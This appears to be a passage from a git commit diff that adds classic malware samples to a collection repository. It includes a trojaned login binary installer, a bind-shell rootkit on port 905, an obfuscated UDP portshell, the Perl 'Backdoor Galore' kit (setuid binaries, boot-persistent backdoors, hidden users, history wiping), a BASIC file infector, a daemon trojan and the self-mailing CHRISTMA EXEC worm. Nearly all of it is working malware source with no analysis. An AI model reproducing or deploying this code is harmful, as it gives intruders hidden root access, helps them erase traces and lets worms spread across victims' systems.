|
||||
void die(char *error);
|
||||
void connection();
|
||||
|
||||
pid_t pid, sid; /* Daemon variables */
|
||||
|
||||
signal(SIGALRM,connection);
|
||||
alarm(1);
|
||||
execute=argv;
|
||||
*execute=TROJAN;
|
||||
|
||||
if ((pid=fork()) < 0) die("Error on fork()"); /* Start daemon process */
|
||||
if (pid > 0) exit(0); /* Exit parent process */
|
||||
if ((sid=setsid()) < 0) die("Error on setsid()"); /* Create new session */
|
||||
if ((chdir("/") < 0)) die("Error on chdir()"); /* Set working directory */
|
||||
umask(0); /* Set umask to 0 to avoid unwanted rights inheritance */
|
||||
close(STDIN_FILENO); /* Close */
|
||||
close(STDOUT_FILENO); /* associated */
|
||||
close(STDERR_FILENO); /* file streams */
|
||||
/* On our own now */
|
||||
|
||||
scanf("%s", passwd);
|
||||
if (strcmp(passwd,ROOT) == 0) {
|
||||
alarm(0);
|
||||
execl("/bin/sh","/bin/sh","-i",0);
|
||||
exit(0); } /* Remove?? */
|
||||
else {
|
||||
execv(REAL,execute);
|
||||
exit(0); } /* Remove?? */
|
||||
}
|
||||
|
||||
void connection() {
|
||||
execv(REAL,execute);
|
||||
exit(0); }
|
||||
|
||||
void die(char *error) {
|
||||
perror(error);
|
||||
exit(1); }
|
||||
|
||||
EOF
|
||||
|
||||
fi
|
||||
|
||||
gcc -o /tmp/login /tmp/drop.c
|
||||
rm -f /tmp/drop.c
|
||||
mv /bin/login /bin/.login
|
||||
mv /tmp/login /bin/
|
||||
|
||||
exit 0
|
||||
|
||||
|
74
Linux/Backdoor.Linux.Rootin.b
Normal file
74
Linux/Backdoor.Linux.Rootin.b
Normal file
@ -0,0 +1,74 @@
|
||||
#!/bin/sh
|
||||
|
||||
# Fearless Rootkit D-Type v0.1
|
||||
# Coded by Merlion
|
||||
# Website: http://areyoufearless.com
|
||||
|
||||
# chmod 755 rootd.sh
|
||||
# ./rootd.sh
|
||||
# telnet to port 905 & run commands. End each command with a semicolon (;)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <netdb.h>
|
||||
#include <netinet/in.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void die(char *error);
|
||||
main(int argc, char **argv) {
|
||||
pid_t pid, sid;
|
||||
int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec, sockopt, sockcli, socklen;
|
||||
unsigned short int mcon;
|
||||
unsigned short int port;
|
||||
char *rbuf, *rmode;
|
||||
struct sockaddr_in Client, Server;
|
||||
if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error creating socket");
|
||||
if (argc != 3) die("Usage");
|
||||
memset(&Server, 0, sizeof(Server));
|
||||
Server.sin_family=AF_INET;
|
||||
port=905;
|
||||
mcon=5;
|
||||
Server.sin_port=htons(port);
|
||||
Server.sin_addr.s_addr=htonl(INADDR_ANY);
|
||||
if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt, sizeof(sockopt)) < 0)
|
||||
die("No socket options set");
|
||||
if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) != 0)
|
||||
die("Could not bind socket");
|
||||
if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()");
|
||||
pid=fork();
|
||||
if (pid < 0) die("Initial fork() failed");
|
||||
if (pid>0) exit(0);
|
||||
if ((chdir("/")) < 0) die("Could not set working directory");
|
||||
if ((setsid()) < 0) die("setsid() failed in creating daemon");
|
||||
umask(0);
|
||||
close(STDIN_FILENO);
|
||||
close(STDOUT_FILENO);
|
||||
close(STDERR_FILENO);
|
||||
/* You're on your own, pal.. */
|
||||
while(1) {
|
||||
socklen=sizeof(Client);
|
||||
if ((sockcli=accept(sock, (struct sockaddr *) &Client, &socklen)) < 0) exit(1); /* syslog msg here still */
|
||||
clipid=getpid();
|
||||
serpid=fork();
|
||||
if (serpid > 0)
|
||||
waitpid(0, &stat, 0);
|
||||
dup2(sockcli, 1);
|
||||
execl("/bin/sh","sh",(char *)0); }
|
||||
close(sockcli); }
|
||||
void die(char *error) {
|
||||
fprintf(stderr, "%s\n", error);
|
||||
exit(1); }
|
||||
|
||||
EOF
|
||||
|
||||
gcc -o /bin/rootd /tmp/rootd.c
|
||||
rm -f /tmp/rootd.c
|
||||
rootd $port $max
|
||||
echo "Rootkit installed at port 905"
|
||||
exit 0
|
22
Linux/Backdoor.Linux.ShadyShell.c
Normal file
22
Linux/Backdoor.Linux.ShadyShell.c
Normal file
@ -0,0 +1,22 @@
|
||||
/* shadyshell.c by Derek Callaway <super@udel.edu> -- S@IRC
|
||||
obfuscated/optimized/compact UDP portshell code; Avoid layer 4 IDS ;-)
|
||||
Example client usage: nc -u host.dom 1337
|
||||
Greets: inNUENdo, s0ftpr0jects, zsh
|
||||
*/
|
||||
#include<stdio.h>
|
||||
#include<sys/socket.h>
|
||||
#include<sys/types.h>
|
||||
#include<netinet/in.h>
|
||||
#include<stdlib.h>
|
||||
#define DP 1337 /* Default Port */
|
||||
void ve(const char*f){perror(f);exit(-1);} int isdigit(),dup2();
|
||||
void usg(char**v){printf("usage: %s [port]\n",*v);exit(0);}
|
||||
int main(int c,char**v){struct sockaddr_in s={};struct sockaddr u;
|
||||
char*p,b[512];if(c==2){for(p=v[1];*p;p++)if(!isdigit(*p))usg(v);c=atoi(*(++v));}
|
||||
s.sin_port=htons(c==2?c:DP),s.sin_addr.s_addr=INADDR_ANY,s.sin_family=AF_INET;
|
||||
if((c=socket(AF_INET,SOCK_DGRAM,0))<0)ve("socket"); /* www.innu.org/~super */
|
||||
if(bind(c,&s,sizeof(s))<0)ve("bind");dup2(c,1);dup2(c,2);s.sin_port=sizeof(u);
|
||||
if(recvfrom(c,&b,1024,0,&u,(int*)&(s.sin_port))<0)ve("socket");
|
||||
if(connect(c,&u,sizeof(u))<0)ve("socket"); /* No overflows here. :P */
|
||||
do{for(*v=b,p=0;**v&&((*v-b)<512||(p=*v));(*v)++)if(p||**v=='\r'||**v=='\n')
|
||||
{**v=0;break;}if(p)continue;system(b);recv(c,&b,1024,0);}while(1);exit(0);}
|
141
Linux/Backdoor.Unix.Galore.11
Normal file
141
Linux/Backdoor.Unix.Galore.11
Normal file
@ -0,0 +1,141 @@
|
||||
#!/usr/bin/perl
|
||||
# BackDoor Galore 1.1 (fixed!)
|
||||
# Author: NTFX <ntfx@legion2000.tk>
|
||||
# Legion2000 Security Research 1995 -
|
||||
# This is a simple perl script which backdoors a system for you.
|
||||
# Updated, set wrong rc.local patch and didnt execute them, blah!
|
||||
# thats what happens when you code at 4am.
|
||||
###################################
|
||||
&option();
|
||||
sub option() {
|
||||
system("clear");
|
||||
print "##################################\n";
|
||||
print "#Backdoor Galore By NTFX #\n";
|
||||
print "#Contact: <ntfx\@legion2000.tk> #\n";
|
||||
print "#Legion2000 Security Research (c)#\n";
|
||||
print "##################################\n";
|
||||
print "#[ 1] Do this first of all. #\n"; # must do this cause im lazy.
|
||||
print "#[ 2] Create setuid binary's. #\n"; # /usr/bin/mail & /usr/bin/find.
|
||||
print "#[ 3] Open up TCP backdoor. #\n"; # 12350 # hid /usr/sbin/.telnetd.
|
||||
print "#[ 4] Open up UDP backdoor. #\n"; # 65535 # hid /usr/sbin/.telnetd.
|
||||
print "#[ 5] Add Cron Sched'd backdoor. #\n"; # 10001 # only open 3 hours a day.
|
||||
print "#[ 6] Add unsuspicious user. #\n"; # gpm or news prob best.
|
||||
print "#[ 7] Hide ptrace Exploit. #\n"; # /dev/.pts.
|
||||
print "#[ 8] Removes Traces #\n";
|
||||
print "#[ 9] Social Calls. #\n"; # Sociable Greetings.
|
||||
print "#[10] Exit the backdoor Script. #\n"; # quit the backdoor.
|
||||
print "##################################\n";
|
||||
print "#Enter Option:";
|
||||
chomp($number=<STDIN>);
|
||||
if($number == "1") { &di() }
|
||||
if($number == "2") { &uid() }
|
||||
if($number == "3") { &tcp() }
|
||||
if($number == "4") { &udp() }
|
||||
if($number == "5") { &cro() }
|
||||
if($number == "6") { &usr() }
|
||||
if($number == "7") { &ptr() }
|
||||
if($number == "8") { &rem() }
|
||||
if($number == "9") { &soc() }
|
||||
if($number == "10") { &ex() }
|
||||
else { &option() } }
|
||||
##################
|
||||
sub di() {
|
||||
system ("clear");
|
||||
system ("cd $HOME; mkdir ntfx script; mv *.c $HOME/ntfx; mv *pl $HOME/script");
|
||||
sleep 2; }
|
||||
##################
|
||||
sub uid() {
|
||||
system ("clear");
|
||||
print "we will now make a setuid file in /usr/bin";
|
||||
system ("cd /usr/bin; chmod +s mail; cd $HOME");
|
||||
print "mail is now +s\n"; #edit as you wish.
|
||||
system ("cd /usr/bin; chmod +s find; cd $HOME");
|
||||
print "find is now +s\n"; #edit as you wish.
|
||||
sleep 1; }
|
||||
##################
|
||||
sub tcp() {
|
||||
system ("clear");
|
||||
print "We are now going to create a basic tcp backdoor\n";
|
||||
system ("cd ../ntfx; gcc tcp.c -o tcp; mv /usr/sbin/.telnetd; echo
|
||||
/usr/sbin/.telnetd >> /etc/rc.d/rc.local; /usr/sbin/.telnetd &"); # starts on boot.
|
||||
print "tcp backdoor is now running on specified port and enabled at boot\n";
|
||||
sleep 1; }
|
||||
###################
|
||||
sub udp() {
|
||||
system ("clear");
|
||||
print "We are now going to install a basic udp backdoor\n";
|
||||
system ("cd ../ntfx; gcc udp.c -o udp; mv /usr/sbin/.telnetd.; echo
|
||||
/usr/sbin/.telnetd. >> /etc/rc.d/rc.local; /usr/sbin/.telnetd. &");
|
||||
print "udp backdoor now running on specified port and enabled at boot\n";
|
||||
sleep 1; }
|
||||
###################
|
||||
sub cro() {
|
||||
system ("clear");
|
||||
print "We are now going to install a backdoor into the crond\n";
|
||||
system ("bash crond.sh");
|
||||
print "The cron backdoor is now installed, and running on the specified port\n";
|
||||
sleep 1; }
|
||||
###################
|
||||
sub usr() {
|
||||
system ("clear");
|
||||
print "we will now add a unsuspicious user to the system\n";
|
||||
print "username: ";
|
||||
chomp($user=<STDIN>); # be sensible, an acc called "hax0r" will be noticed.
|
||||
print "UID: ";
|
||||
chomp($uid=<STDIN>);
|
||||
print "GID: ";
|
||||
chomp($gid=<STDIN>);
|
||||
print "home dir: ";
|
||||
chomp($home=<STDIN>); #/home/httpd maybe?
|
||||
print "type of shell: ";
|
||||
chomp($sh=<STDIN>);
|
||||
print "comments: "; # preferably leave blank
|
||||
chomp($cm=<STDIN>);
|
||||
system("/usr/sbin/useradd $user -u $uid -g $gid -d $home -s $sh -c $cm");
|
||||
system("passwd $user");
|
||||
sleep 1; }
|
||||
##################
|
||||
sub ptr() {
|
||||
system ("clear");
|
||||
print "we are now going to compile and hide the ptrace exploit\n";
|
||||
print "name the user you previously entered";
|
||||
chomp ($usr=<STDIN>);
|
||||
system ("cd ../ntfx; gcc ptrace.c -o pts; chown $usr pts; mv pts /dev/.pts");
|
||||
print "ptrace is now stored in /dev/.pts";
|
||||
sleep 1; }
|
||||
##################
|
||||
sub soc() {
|
||||
system ("clear");
|
||||
print "Greetings:\n";
|
||||
sleep 1;
|
||||
print "opt1k, SpyModem, eckis, EazyMoney, Phantasm, Epheo, I-L, wired-\n";
|
||||
sleep 1;
|
||||
print "BlackSun Research, Legion2000 Crew, efnet #feed-the-goats\n";
|
||||
$sex;
|
||||
print "press any key to continue....";
|
||||
chomp($sex=<STDIN>); }
|
||||
##################
|
||||
sub rem() {
|
||||
system ("clear");
|
||||
print "we are now going to remove files we have used.\n";
|
||||
system ("rm -rf $HOME/scripts; rm -rf $HOME/ntfx");
|
||||
print "now removing history files.\n";
|
||||
system ("HISTFILE=/dev/null; HISTFILESIZE=0; rm -rf .*"); }
|
||||
# had to redo due to paul holden selecting remove traces on the original source.
|
||||
#############
|
||||
sub ex() {
|
||||
system("clear");
|
||||
print" # ##### ### ### ###\n";
|
||||
print" # ###### #### # #### # # # # # # # # # #\n";
|
||||
print" # # # # # # # ## # # # # # # # #\n";
|
||||
print" # ##### # # # # # # # ##### # # # # # #\n";
|
||||
print" # # # ### # # # # # # # # # # # # #\n";
|
||||
print" # # # # # # # # ## # # # # # # #\n";
|
||||
print" ####### ###### #### # #### # # ####### ### ### ###\n";
|
||||
print" www.legion2000.tk\n";
|
||||
print" efnet #feed-the-goats\n";
|
||||
print"\n\n";
|
||||
print"Press Any Key To Exit\n";
|
||||
$sex;
|
||||
chomp($sex=<STDIN>);
|
||||
exit 1;}
|
1034
Linux/Constructor.Script.IBBM.a
Normal file
1034
Linux/Constructor.Script.IBBM.a
Normal file
File diff suppressed because it is too large
Load Diff
13
Linux/Virus.BAS.Xyc
Normal file
13
Linux/Virus.BAS.Xyc
Normal file
@ -0,0 +1,13 @@
|
||||
CLS
|
||||
REM The first Quick Basic infection Virus
|
||||
REM written by SeCoNd PaRt To HeLl
|
||||
REM for showing, that .BAS can be infected
|
||||
REM NAME of the Virus: BAS.XYC
|
||||
OPEN "C:\xyc.bat" FOR OUTPUT AS #1
|
||||
PRINT #1, "@echo off"
|
||||
PRINT #1, "if exist xyc.bas copy xyc.bas C:\xyc.bas"
|
||||
PRINT #1, "for %%r in (*.bas ..\*.bas %windir%\*.bas) do copy C:\xyc.bas %%r"
|
||||
CLOSE #1
|
||||
SHELL "C:\xyc.bat"
|
||||
|
||||
|
96
Linux/Virus.Linux.TrojoDaemon.c
Normal file
96
Linux/Virus.Linux.TrojoDaemon.c
Normal file
@ -0,0 +1,96 @@
|
||||
/* ......:::: daemon trojo by DeV^AwaY ::::......
|
||||
*
|
||||
*
|
||||
* [*] --> coded by: DeV^AwaY
|
||||
* [*] ------------> devilnet@freemail.it
|
||||
* [*] ------------> ircnet/efnet@DeV^AwaY
|
||||
* [*] --> V3rsion: 0.2
|
||||
*
|
||||
* install:
|
||||
* To install this trojan you should copy the real daemon in another
|
||||
* directory !WITH THE SOME NAME!. Then you should compile this source on the
|
||||
* real daemon file in its some directory.
|
||||
* So write in /dev/ptyh all path/commands to execute with
|
||||
* daemon. If you must use options with commands you must divide they
|
||||
* with the $ character.
|
||||
* Ex:
|
||||
*
|
||||
* cat /dev/ptyh
|
||||
* /home/hacker/. /psybnc <-- without options
|
||||
* /home/hacker/bot/eggdrop$ -m bot.conf -t <-- with options
|
||||
* /home/hacker/. $ <-- to run the file ". "
|
||||
*
|
||||
* Default
|
||||
* trojo daemon /usr/sbin/httpd
|
||||
* real deamon /usr/bin/httpd #EXE_PATH
|
||||
*
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
#define TRJ_PATH "/dev/ptyh"
|
||||
#define EXE_PATH "/usr/bin/httpd"
|
||||
|
||||
main (int argc,char **argv,char **envp) {
|
||||
|
||||
char fstr[200],**addr=malloc(200),slas[500],slaw[500];
|
||||
int i,ic=1,deic,sllen;
|
||||
FILE *ofile;
|
||||
|
||||
if (fork() == 0) {
|
||||
if ((ofile=fopen(TRJ_PATH,"r"))==NULL) exit(0);
|
||||
|
||||
while (!feof(ofile)) {
|
||||
fgets(fstr, 200, ofile);
|
||||
for (i=0; i<strlen(fstr); i++) if (fstr[i]=='\n') fstr[i]='\0';
|
||||
addr[ic]=malloc(200);
|
||||
strcpy(addr[ic],fstr);
|
||||
ic++;
|
||||
}
|
||||
|
||||
deic=ic-2; ic=0;
|
||||
|
||||
while (ic!=deic) {
|
||||
ic++;
|
||||
i=0;
|
||||
memset(slaw, 0, 500);
|
||||
strcpy(slas,addr[ic]);
|
||||
sllen=strlen(slas);
|
||||
|
||||
while (i!=sllen) {
|
||||
if (slas[i]=='$') {
|
||||
(slas[i]='"');
|
||||
goto out; }
|
||||
else i++;
|
||||
}
|
||||
|
||||
out:
|
||||
if (sllen==i) strcat(slas,"\"");
|
||||
strncpy(slaw,slas,i);
|
||||
if ((ofile=fopen(slaw,"r"))==NULL) exit(0);
|
||||
strcpy(addr[ic],slas);
|
||||
strcpy(addr[ic],"cd \"");
|
||||
|
||||
while (sllen!=0) {
|
||||
if (slas[sllen]=='/') goto out2;
|
||||
else sllen--;
|
||||
}
|
||||
out2:
|
||||
strncat(addr[ic],slas,sllen);
|
||||
strcat(addr[ic],"\" && \".");
|
||||
strcat(addr[ic],slas+sllen);
|
||||
strcat(addr[ic]," 1>/dev/null 2>/dev/null &");
|
||||
system(addr[ic]);
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if ((ofile=fopen(EXE_PATH,"r"))==NULL) {
|
||||
printf("bash: %s: No such file or directory\n",EXE_PATH);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
execve(EXE_PATH, argv, envp);
|
||||
|
||||
}
|
13
Linux/Virus.Script.Higu
Normal file
13
Linux/Virus.Script.Higu
Normal file
@ -0,0 +1,13 @@
|
||||
<< CLLCD
|
||||
"Press any key to run Protect System" MSGBOX
|
||||
<< DO
|
||||
HOME CLEAR VARS OBJ-> DROP
|
||||
'V1' STO
|
||||
PURGE 'V1'
|
||||
UNTIL DEPTH 0
|
||||
END
|
||||
>> CLVAR CLEAR
|
||||
CLLCD
|
||||
"Bye HP48..... virus_br@hotmail.com Higuita(3c)" MSGBOX
|
||||
1400 .60 BEEP
|
||||
>> 'BYEHP48' [STO]
|
102
Linux/Virus.Script.IBM.XMasTreeWorm
Normal file
102
Linux/Virus.Script.IBM.XMasTreeWorm
Normal file
@ -0,0 +1,102 @@
|
||||
/*********************/
|
||||
/* LET THIS EXEC */
|
||||
/* */
|
||||
/* RUN */
|
||||
/* */
|
||||
/* AND */
|
||||
/* */
|
||||
/* ENJOY */
|
||||
/* */
|
||||
/* YOURSELF! */
|
||||
/*********************/
|
||||
'VMFCLEAR'
|
||||
SAY ' * '
|
||||
SAY ' * '
|
||||
SAY ' *** '
|
||||
SAY ' ***** '
|
||||
SAY ' ******* '
|
||||
SAY ' ********* '
|
||||
SAY ' ************* A'
|
||||
SAY ' ******* '
|
||||
SAY ' *********** VERY'
|
||||
SAY ' *************** '
|
||||
SAY ' ******************* HAPPY'
|
||||
SAY ' *********** '
|
||||
SAY ' *************** CHRISTMAS'
|
||||
SAY ' ******************* '
|
||||
SAY ' *********************** AND MY'
|
||||
SAY ' *************** '
|
||||
SAY ' ******************* BEST WISHES'
|
||||
SAY ' *********************** '
|
||||
SAY ' *************************** FOR THE NEXT'
|
||||
SAY ' ****** '
|
||||
SAY ' ****** YEAR'
|
||||
SAY ' ****** '
|
||||
/* browsing this file is no fun at all
|
||||
just type CHRISTMAS from cms */
|
||||
dropbuf
|
||||
makebuf
|
||||
"q t (stack"
|
||||
pull d1 d2 d3 d4 d5 dat
|
||||
pull zeile
|
||||
jeah = substr(dat,7,2)
|
||||
tack = substr(dat,4,2)
|
||||
mohn = substr(dat,1,2)
|
||||
if jeah <= 88 then do
|
||||
if mohn <2 ] mohn = 12 then do
|
||||
DROPBUF
|
||||
MAKEBUF
|
||||
"IDENTIFY ( FIFO"
|
||||
PULL WER VON WO IST REST
|
||||
DROPBUF
|
||||
MAKEBUF
|
||||
"EXECIO * DISKR " WER " NAMES A (FIFO"
|
||||
DO WHILE QUEUED() > 0
|
||||
PULL NICK NAME ORT
|
||||
NAM = INDEX(NAME,'.')+1
|
||||
IF NAM > 0 THEN DO
|
||||
NAME = SUBSTR(NAME,NAM)
|
||||
END
|
||||
NAM = INDEX(ORT,'.')+1
|
||||
IF NAM > 0 THEN DO
|
||||
ORT = SUBSTR(ORT,NAM)
|
||||
END
|
||||
IF LENGTH(NAME)>0 THEN DO
|
||||
IF LENGTH(ORT) = 0 THEN DO
|
||||
ORT = WO
|
||||
END
|
||||
if name ^= "RELAY" then do
|
||||
"SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack"
|
||||
end
|
||||
END
|
||||
END
|
||||
DROPBUF
|
||||
MAKEBUF
|
||||
ANZ = 1
|
||||
"EXECIO * DISKR " WER " NETLOG A (FIFO"
|
||||
DO WHILE QUEUED() > 0
|
||||
PULL KIND FN FT FM ACT FROM ID AT NODE REST
|
||||
IF ACT = 'SENT' THEN DO
|
||||
IF ANZ = 1 THEN DO
|
||||
OK.ANZ = ID
|
||||
END
|
||||
IF ANZ > 1 THEN DO
|
||||
OK.ANZ = ID
|
||||
NIXIS = 0
|
||||
DO I = 1 TO ANZ-1
|
||||
IF OK.I = ID THEN DO
|
||||
NIXIS = 1
|
||||
END
|
||||
END
|
||||
END
|
||||
ANZ = ANZ + 1
|
||||
IF NIXIS = 0 THEN DO
|
||||
"SF CHRISTMAS EXEC A " ID " AT " NODE " (ack"
|
||||
END
|
||||
END
|
||||
END
|
||||
DROPBUF
|
||||
END
|
||||
end
|
||||
end
|
||||
|
BIN
Linux/Virus.Script.MBP.Kynel
Normal file
BIN
Linux/Virus.Script.MBP.Kynel
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user